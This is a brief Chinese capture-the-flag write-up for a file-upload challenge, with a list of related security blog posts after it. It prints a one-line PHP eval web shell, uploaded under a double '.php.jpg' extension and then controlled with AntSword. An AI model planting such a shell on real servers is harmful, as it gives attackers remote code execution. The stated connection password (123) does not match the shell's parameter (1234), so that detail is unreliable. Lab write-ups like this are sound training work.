题目
1.打开靶机
随便上传一个图片,查看get请求发现**/upload/XXX.jpg**
2.创建一个脚本文件
命名为flag.php.jpg,并上传
脚本文件内容:
<?php @eval($_POST[1234])?>
3上传后复制文件get请求的链接并打开蚁剑
连接密码为123
双击链接
4,查找'/'在最下面找到flag文件
5,打开文件得到flag
相关推荐
姬成韶1 小时前
BUUCTF---[第一章 web入门]常见的搜集小张的博客之旅2 小时前
2026第十届“楚慧杯”湖北省网络与数据安全实践能力竞赛 (全Writeup)汤愈韬3 小时前
OSPF考题啥都想学点3 小时前
pikachu靶场——SQL-Inject—1(Kali系统)heze093 小时前
sqli-labs-Less-46啥都想学点3 小时前
pikachu靶场——csrf的几个问题忡黑梨3 小时前
BUUCTF_reverse_[MRCTF2020]TransformCodefengfeng4 小时前
zsteg的安装与使用(kali环境)Chockmans5 小时前
春秋云境CVE-2016-7124汤愈韬5 小时前
Stub区域应用、Totally Stub区域应用、NSSA区域应用和NSSA LSA详解